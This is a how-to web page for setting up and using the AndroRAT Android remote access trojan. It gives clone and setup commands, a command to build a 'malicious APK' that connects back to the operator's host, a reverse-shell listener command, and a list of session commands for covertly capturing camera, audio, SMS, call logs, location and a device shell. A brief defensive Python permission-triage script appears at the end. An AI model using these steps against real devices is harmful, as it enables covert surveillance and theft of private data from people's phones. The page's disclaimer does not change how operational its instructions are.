How To Use Remote Access Trojan AndroRAT | All Errors Solved

AndroRAT, or Android Remote Administration Tool, is free software that allows someone to control an Android device remotely. It was initially created for research and educational purposes but has also been used for harmful activities. This guide explains how AndroRAT functions and how it can be used responsibly in penetration testing.

Disclaimer: This article is for educational purposes only. Unauthorized use of AndroRAT on devices without permission is illegal and punishable by law.

Prerequisites

Before using AndroRAT, you need:
  • A computer running Windows or Linux
  • Java Development Kit (JDK) installed
  • A port forwarding service (to access a device on a different network)

Downloading AndroRAT

You can find AndroRAT's source code on GitHub. Clone it and install its requirements in a Python virtual environment using the following commands:
git clone https://github.com/karma9874/AndroRAT
cd AndroRAT
python3 -m venv myenv
source myenv/bin/activate
pip3 install -r requirements.txt
Now, wait until all the required packages are installed.

Fixing Errors In AndroRAT Files

After successful installation, you have to make a small change to the androRAT.py file by removing or commenting out lines of code that are no longer supported.
  • Remove lines 8 to 14: You can edit the androRAT.py file with any text editor. Remove or comment out lines 8 to 14, as the ngrok setup is outdated and no longer supports port forwarding.
Now you can type the following commands to see the successful execution banner of androRAT:
chmod +x androRAT.py
./androRAT.py --help
The available options and their descriptions are now visible in the terminal.

Generating Payload

1. Generate a Malicious APK: To create a payload, type the following command:
./androRAT.py --build -i type_your_host -p type_your_port -o
You don't have to provide any name for the output file and may change it later by renaming it.

2. Reverse Shell: To start the listener, simply type the following command:
./androRAT.py --shell -i type_listening_host -p type_listening_port
Now install your payload APK on the target device and open it to get remote access.

3. Gain Remote Access: Once the target installs and opens the APK, the connection will be established, and you will get a session:
    deviceInfo                 --> returns basic info of the device
    camList                    --> returns cameraID  
    takepic [cameraID]         --> Takes picture from camera
    startVideo [cameraID]      --> starts recording the video
    stopVideo                  --> stop recording the video and return the video file
    startAudio                 --> starts recording the audio
    stopAudio                  --> stop recording the audio
    getSMS [inbox|sent]        --> returns inbox sms or sent sms in a file 
    getCallLogs                --> returns call logs in a file
    shell                      --> starts a sh shell of the device
    vibrate [number_of_times]  --> vibrate the device number of time
    getLocation                --> return the current location of the device
    getIP                      --> returns the ip of the device
    getSimDetails              --> returns the details of all sim of the device
    clear                      --> clears the screen
    getClipData                --> return the current saved text from the clipboard
    getMACAddress              --> returns the mac address of the device
    exit                       --> exit the interpreter

Conclusion

AndroRAT is a powerful tool for Android penetration testing, but it must be used responsibly. Understanding its capabilities helps in enhancing cybersecurity defense against such threats.
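
The command list above maps onto a small set of Android permissions, which is something a defender can check before an unknown APK is installed. The sketch below is an added example, not code from the original page or the AndroRAT project: it parses `aapt dump permissions` output and flags an app that combines network access with several of those permissions. The permission-to-command mapping, the threshold of 4 and both sample inputs are assumptions constructed for illustration.

```python
import re

# Android permissions a capability from the command list needs (assumed mapping,
# based on the Android platform, not read from AndroRAT's manifest).
CAPABILITY_PERMISSIONS = {
    "android.permission.CAMERA": "takepic / startVideo",
    "android.permission.RECORD_AUDIO": "startAudio / startVideo",
    "android.permission.READ_SMS": "getSMS",
    "android.permission.READ_CALL_LOG": "getCallLogs",
    "android.permission.ACCESS_FINE_LOCATION": "getLocation",
    "android.permission.READ_PHONE_STATE": "getSimDetails",
}
NETWORK = "android.permission.INTERNET"
# Accepts both "uses-permission: name='x'" and the older "uses-permission: x".
PERM_RE = re.compile(r"^uses-permission:\s*(?:name=)?'?([\w.]+)'?", re.M)

def parse_permissions(aapt_output):
    """Extract permission names from `aapt dump permissions` text."""
    return set(PERM_RE.findall(aapt_output))

def triage(aapt_output, threshold=4):
    """Return (flagged, matched); matched maps permission -> related command."""
    perms = parse_permissions(aapt_output)
    matched = {p: c for p, c in CAPABILITY_PERMISSIONS.items() if p in perms}
    # Flag only when data-collection permissions coexist with network access.
    flagged = NETWORK in perms and len(matched) >= threshold
    return flagged, matched

# Constructed sample inputs (not taken from any real APK).
SUSPECT = """package: com.example.updater
uses-permission: name='android.permission.INTERNET'
uses-permission: name='android.permission.CAMERA'
uses-permission: name='android.permission.RECORD_AUDIO'
uses-permission: name='android.permission.READ_SMS'
uses-permission: name='android.permission.READ_CALL_LOG'
uses-permission: name='android.permission.ACCESS_FINE_LOCATION'
uses-permission: name='android.permission.VIBRATE'
"""
BENIGN = """package: com.example.flashlight
uses-permission: name='android.permission.CAMERA'
uses-permission: name='android.permission.INTERNET'
"""

if __name__ == "__main__":
    for label, sample in (("suspect", SUSPECT), ("benign", BENIGN)):
        flagged, matched = triage(sample)
        print(label, "FLAG" if flagged else "ok", sorted(matched))
```

A flag here is a triage signal for manual review, not a verdict: legitimate apps can request the same permissions, so the result should be weighed against what the app claims to do.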
